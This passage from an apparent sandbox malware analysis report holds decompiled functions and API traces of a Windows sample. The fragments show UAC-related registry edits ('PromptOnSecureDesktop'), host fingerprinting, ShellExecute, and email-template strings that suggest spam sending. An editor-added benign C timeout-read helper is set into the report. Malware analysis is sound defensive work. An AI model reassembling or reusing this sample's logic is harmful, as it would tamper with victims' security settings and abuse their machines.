                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 76e4934d3476f9001860cbae04dd53a185140269f848e10cc5c46de5c8c97336
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: F501087251520AAFDF02EF90ED84BEF7BACEB08255F418061F901E2050D770DA549BB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
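The three entries above (E00403F8C with its ReadFile at 0x00403FB8, and the WriteFile/ReadFile entries at 0x020841AB and 0x0208421F in the 0x02080000 memory dump, which show the same four-call sequence) are one I/O helper: an overlapped call, ERROR_IO_PENDING (0x3e5) handling, a bounded WaitForSingleObject on the caller-supplied event, GetOverlappedResult, and a final "transferred == requested" check that turns any short transfer into failure. The decompilation also shows the weak spot: the OVERLAPPED block _v24 is a stack local, and when the wait times out the function returns with the request still in flight, so the kernel can later complete into a dead stack frame and into a buffer the caller may have released. The code below is an example added by the editor, not the sample's code or Joe Sandbox output; it keeps the same all-or-nothing contract, cancels and drains the request on timeout, and carries a POSIX branch (poll/read, the editor's substitution so it builds and runs off Windows) that can be exercised on a pipe. The function and parameter names are the editor's.

```c
/* Added example for this report, not code from the sample: an all-or-nothing
 * read with a deadline, same contract as E00403F8C (and the WriteFile twin at
 * 0x020841AB): success only when the full count completes within timeout_ms.
 * The Windows branch mirrors the decompiled control flow but, unlike the sample,
 * cancels a still-pending request before returning, because the OVERLAPPED
 * block lives on the stack. The POSIX branch (what a non-Windows build uses)
 * gives the same semantics with poll()+read(). Names are the editor's. */
#define _POSIX_C_SOURCE 200809L
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>

/* h must be opened with FILE_FLAG_OVERLAPPED; ev is a manual-reset event. */
int read_exact_timed(HANDLE h, void *buf, DWORD len, HANDLE ev, DWORD timeout_ms)
{
    OVERLAPPED ov;
    DWORD got = 0;
    memset(&ov, 0, sizeof ov);
    ov.hEvent = ev;
    if (!ReadFile(h, buf, len, &got, &ov)) {
        if (GetLastError() != ERROR_IO_PENDING)          /* 0x3e5 in the listing */
            return 0;
        if (WaitForSingleObject(ev, timeout_ms) != WAIT_OBJECT_0) {
            /* The sample returns here with the I/O still in flight; the kernel
             * would later write into a dead stack frame. Cancel and drain it. */
            CancelIoEx(h, &ov);
            GetOverlappedResult(h, &ov, &got, TRUE);
            return 0;
        }
        if (!GetOverlappedResult(h, &ov, &got, FALSE))
            return 0;
    }
    return got == len;                                   /* short transfer == failure */
}

#else
#include <errno.h>
#include <poll.h>
#include <time.h>
#include <unistd.h>

static int64_t now_ms(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (int64_t)ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
}

/* fd is any readable descriptor (pipe, socket). Partial reads are accumulated
 * until len bytes have arrived or the deadline passes; returns 1 only on the
 * full count, 0 on timeout, EOF or error, like the sample's helper. */
int read_exact_timed(int fd, void *buf, size_t len, int64_t timeout_ms)
{
    int64_t deadline = now_ms() + timeout_ms;
    size_t got = 0;
    while (got < len) {
        int64_t left = deadline - now_ms();
        if (left < 0)
            return 0;                                    /* deadline passed */
        struct pollfd p = { fd, POLLIN, 0 };
        int r = poll(&p, 1, (int)left);
        if (r < 0 && errno == EINTR)
            continue;
        if (r <= 0)
            return 0;                                    /* timeout or error */
        ssize_t n = read(fd, (char *)buf + got, len - got);
        if (n <= 0)
            return 0;                                    /* EOF or error */
        got += (size_t)n;
    }
    return 1;
}
#endif
```

The Windows branch's CancelIoEx plus a blocking GetOverlappedResult is the part the sample lacks: after that pair the kernel no longer references the stack OVERLAPPED or the buffer, so the caller can safely free or reuse both.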

                                                                                APIs
                                                                                • lstrcmp.KERNEL32(?,80000009), ref: 0208E066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 1534048567-1846390581
                                                                                • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction ID: 9e9754b466fccb918e933cc051f2bbb5acf9e05625caaf8e0252586d648b7226
                                                                                • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction Fuzzy Hash: D8F0CD322003069BCB62DF64DC84A83B7E8FB09325B048A2AF698C3060D370F4D8CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040A4C7(intOrPtr _a4) {
                                                                                				long _t3;
                                                                                				LONG* _t8;
                                                                                				long _t9;
                                                                                
                                                                                				_t9 = GetTickCount();
                                                                                				_t8 = _a4 + 0x5c;
                                                                                				while(1) {
                                                                                					_t3 = InterlockedExchange(_t8, 1);
                                                                                					if(_t3 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t3 = GetTickCount() - _t9;
                                                                                					if(_t3 < 0x1388) {
                                                                                						Sleep(0);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t3;
			}

• Statement addresses (one per C-code line above, 0x00000000 where a line has no instruction): 0x0040a4dd 0x0040a4df 0x0040a4f7 0x0040a4fa 0x0040a4fe 0x00000000 0x00000000 0x0040a4e6 0x0040a4ed 0x0040a4f1 0x00000000 0x0040a4f1 0x00000000 0x0040a4ed 0x0040a504

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404E92(void* __ecx) {
                                                                                				long _t2;
                                                                                				void* _t7;
                                                                                				LONG* _t8;
                                                                                				long _t9;
                                                                                
                                                                                				_t7 = __ecx;
                                                                                				_t9 = GetTickCount();
                                                                                				_t8 = _t7 + 4;
                                                                                				while(1) {
                                                                                					_t2 = InterlockedExchange(_t8, 1);
                                                                                					if(_t2 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t2 = GetTickCount() - _t9;
                                                                                					if(_t2 < 0x2710) {
                                                                                						Sleep(0xa);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t2;
			}

• Statement addresses (one per C-code line above, 0x00000000 where a line has no instruction): 0x00404e9c 0x00404ea6 0x00404ea8 0x00404ec0 0x00404ec3 0x00404ec7 0x00000000 0x00000000 0x00404eaf 0x00404eb6 0x00404eba 0x00000000 0x00404eba 0x00000000 0x00404eb6 0x00404ecd

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404BD1(void* __ecx) {
                                                                                				long _t2;
                                                                                				void* _t7;
                                                                                				LONG* _t8;
                                                                                				long _t9;
                                                                                
                                                                                				_t7 = __ecx;
                                                                                				_t9 = GetTickCount();
                                                                                				_t8 = _t7 + 0xc;
                                                                                				while(1) {
                                                                                					_t2 = InterlockedExchange(_t8, 1);
                                                                                					if(_t2 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t2 = GetTickCount() - _t9;
                                                                                					if(_t2 < 0x1388) {
                                                                                						Sleep(0);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t2;
			}

• Statement addresses (one per C-code line above, 0x00000000 where a line has no instruction): 0x00404bdb 0x00404be5 0x00404be7 0x00404bff 0x00404c02 0x00404c06 0x00000000 0x00000000 0x00404bee 0x00404bf5 0x00404bf9 0x00000000 0x00404bf9 0x00000000 0x00404bf5 0x00404c0c

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004030FA(LONG* _a4) {
                                                                                				long _t3;
                                                                                				long _t5;
                                                                                
                                                                                				_t5 = GetTickCount();
                                                                                				while(1) {
                                                                                					_t3 = InterlockedExchange(_a4, 1);
                                                                                					if(_t3 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t3 = GetTickCount() - _t5;
                                                                                					if(_t3 < 0x1388) {
                                                                                						Sleep(0);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t3;
                                                                                			}


                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00403103
                                                                                • GetTickCount.KERNEL32 ref: 0040310F
                                                                                • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0040E177(signed int _a4, long _a8) {
                                                                                				void* _v8;
                                                                                				void* _v12;
                                                                                				void* __ecx;
                                                                                				void* _t31;
                                                                                				void* _t34;
                                                                                				intOrPtr* _t36;
                                                                                				void* _t38;
                                                                                				intOrPtr* _t41;
                                                                                				void* _t43;
                                                                                				void* _t46;
                                                                                				void* _t47;
                                                                                				void* _t57;
                                                                                				void* _t58;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t72;
                                                                                				void* _t77;
                                                                                
                                                                                				_push(_t58);
                                                                                				_push(_t58);
                                                                                				if(_a8 != 0) {
                                                                                					L2:
                                                                                					if( *0x4136c0 == 0) {
                                                                                						L20:
                                                                                						_t31 = 1;
                                                                                						L21:
                                                                                						return _t31;
                                                                                					}
                                                                                					if((_a4 & 0x00000001) != 0) {
                                                                                						_t46 = E0040DFE2(_t58, 1,  &_v8,  &_a8);
                                                                                						_t67 = _t67 + 0xc;
                                                                                						if(_t46 != 0) {
                                                                                							_t81 = _a8;
                                                                                							if(_a8 != 0) {
                                                                                								_t47 = E0040DBCF(_t81, 0x40000000, 2);
                                                                                								_pop(_t58);
                                                                                								_v12 = _t47;
                                                                                								if(_t47 != 0xffffffff) {
                                                                                									_t57 = _v8;
                                                                                									if(_t57 != 0 && _a8 != 0) {
                                                                                										E00402544(_t57, _t57, _a8, 0xe4, 0xc8);
                                                                                										_t67 = _t67 + 0x14;
                                                                                										if(WriteFile(_v12, _t57, _a8,  &_a8, 0) != 0) {
                                                                                											 *0x4136c0 =  *0x4136c0 & 0x00000000;
                                                                                										}
                                                                                									}
                                                                                									CloseHandle(_v12);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					if((_a4 & 0x00000002) == 0) {
                                                                                						L19:
                                                                                						goto L20;
                                                                                					}
                                                                                					_t34 = E0040DFE2(_t58, 2,  &_v8,  &_a8);
                                                                                					_t68 = _t67 + 0xc;
                                                                                					if(_t34 == 0 || _a8 == 0) {
                                                                                						goto L19;
                                                                                					} else {
                                                                                						E00402544(_v8, _v8, _a8, 0xe4, 0xc8);
                                                                                						_t36 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
                                                                                						_t38 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t36, _v8, _a8);
                                                                                						_t72 = _t68 + 0x50;
                                                                                						if(_t38 != 0) {
                                                                                							L17:
                                                                                							 *0x4136c0 =  *0x4136c0 & 0x00000000;
                                                                                							L18:
                                                                                							E0040EE2A(_t58, 0x4122f8, 0, 0x100);
                                                                                							E0040EE2A(_t58, 0x4128f8, 0, 0x100);
                                                                                							goto L19;
                                                                                						}
                                                                                						_t41 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
                                                                                						_t43 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t41, _v8, _a8);
                                                                                						_t72 = _t72 + 0x3c;
                                                                                						if(_t43 == 0) {
                                                                                							goto L18;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                				}
                                                                                				_t31 = 1;
                                                                                				_t77 =  *0x4120ec - _t31; // 0x1
                                                                                				if(_t77 != 0) {
                                                                                					goto L21;
                                                                                				}
                                                                                				goto L2;
                                                                                			}


                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
                                                                                • CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
                                                                                  • Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                  • Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                  • Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 4151426672-2980165447
                                                                                • Opcode ID: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                • Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
                                                                                • Opcode Fuzzy Hash: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                • Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000001,020844E2,00000000,00000000,00000000), ref: 0208E470
                                                                                • CloseHandle.KERNEL32(00000001,00000003), ref: 0208E484
                                                                                  • Part of subcall function 0208E2FC: RegCreateKeyExA.ADVAPI32(80000001,0208E50A,00000000,00000000,00000000,00020106,00000000,0208E50A,00000000,000000E4), ref: 0208E319
                                                                                  • Part of subcall function 0208E2FC: RegSetValueExA.ADVAPI32(0208E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E38E
                                                                                  • Part of subcall function 0208E2FC: RegDeleteValueA.ADVAPI32(0208E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E3BF
                                                                                  • Part of subcall function 0208E2FC: RegCloseKey.ADVAPI32(0208E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0208E50A), ref: 0208E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 4151426672-2980165447
                                                                                • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction ID: 2b98ff685954140c816a65b74b25de078f968a8bf133daad0dd8e89027b85047
                                                                                • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction Fuzzy Hash: 4E41A4B2900314BBEB217E61CC45FEB3BADEB04724F148035FE49A4191E7B58650EAA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 020883C6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02088477
                                                                                  • Part of subcall function 020869C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 020869E5
                                                                                  • Part of subcall function 020869C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 02086A26
                                                                                  • Part of subcall function 020869C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 02086A3A
                                                                                  • Part of subcall function 0208EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02081DCF,?), ref: 0208EEA8
                                                                                  • Part of subcall function 0208EE95: HeapFree.KERNEL32(00000000), ref: 0208EEAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 359188348-2980165447
                                                                                • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction ID: 2724858bd519a30ad1be6d2ae0aba5c1749d747f9f184cd50d72b4e1b9a4c2ab
                                                                                • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction Fuzzy Hash: 864171B290020DBFEB11FBA09D80EFF77ADEB04304F5484A6E584D6110FBB05A94AB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,0208E859,00000000,00020119,0208E859,PromptOnSecureDesktop), ref: 0208E64D
                                                                                • RegCloseKey.ADVAPI32(0208E859,?,?,?,?,000000C8,000000E4), ref: 0208E787
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 47109696-2980165447
                                                                                • Opcode ID: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                • Instruction ID: c257cf7e6b94d81f34863d2b954edc28be7cd67dc6b021f1ba82f4bda334e80e
                                                                                • Opcode Fuzzy Hash: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                • Instruction Fuzzy Hash: 434109B2D0021DBFDF11EFA4DC84DEEBBB9FB08344F144466FA40A6150E3719A559B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0208AFFF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0208B00D
                                                                                  • Part of subcall function 0208AF6F: gethostname.WS2_32(?,00000080), ref: 0208AF83
                                                                                  • Part of subcall function 0208AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 0208AFE6
                                                                                  • Part of subcall function 0208331C: gethostname.WS2_32(?,00000080), ref: 0208333F
                                                                                  • Part of subcall function 0208331C: gethostbyname.WS2_32(?), ref: 02083349
                                                                                  • Part of subcall function 0208AA0A: inet_ntoa.WS2_32(00000000), ref: 0208AA10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %OUTLOOK_BND_
                                                                                • API String ID: 1981676241-3684217054
                                                                                • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction ID: 325e11499c122cf16a0d6d67822d6b8668a70156c8ba697a81960d0e9256c09b
                                                                                • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction Fuzzy Hash: 3F41FCB290034CABDB25AFA0DC45EEF3BADFB08304F14442AF92592151EA75E6549F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 02089536
                                                                                • Sleep.KERNEL32(000001F4), ref: 0208955D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShellSleep
                                                                                • String ID:
                                                                                • API String ID: 4194306370-3916222277
                                                                                • Opcode ID: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction ID: 5d16e66af269ab9b43f48f8727283cb76ee4f48751b8922d73db173501e5493b
                                                                                • Opcode Fuzzy Hash: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction Fuzzy Hash: 4541E4B190838D6FEB77BB64D888BFB3BE49B02314F1441A5D4C2973A2D7B44981E711
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0208B9D9
                                                                                • InterlockedIncrement.KERNEL32(00413648), ref: 0208BA3A
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0208BA94
                                                                                • GetTickCount.KERNEL32 ref: 0208BB79
                                                                                • GetTickCount.KERNEL32 ref: 0208BB99
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0208BE15
                                                                                • closesocket.WS2_32(00000000), ref: 0208BEB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountIncrementInterlockedTick$closesocket
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 1869671989-2903620461
                                                                                • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction ID: 0333b5a0ab3b6e0270b1a9a042e86047f2cee39b6ad9d7a08e7be6a59af01e56
                                                                                • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction Fuzzy Hash: 23318B72500348EFDF65EFA4DC84AEEB7A9EB48304F204056FA64C2160EB709685DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E00408CEE() {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				long _t15;
                                                                                				char _t17;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr* _t20;
                                                                                				void* _t25;
                                                                                				signed int _t31;
                                                                                				signed char _t35;
                                                                                				signed int _t36;
                                                                                				char* _t41;
                                                                                				intOrPtr* _t42;
                                                                                				signed int _t45;
                                                                                
                                                                                				_push(_t34);
                                                                                				_t31 = 0;
                                                                                				if( *0x413380 == 0) {
                                                                                					L17:
                                                                                					return _t15;
                                                                                				}
                                                                                				_t15 = GetTickCount() -  *0x413388;
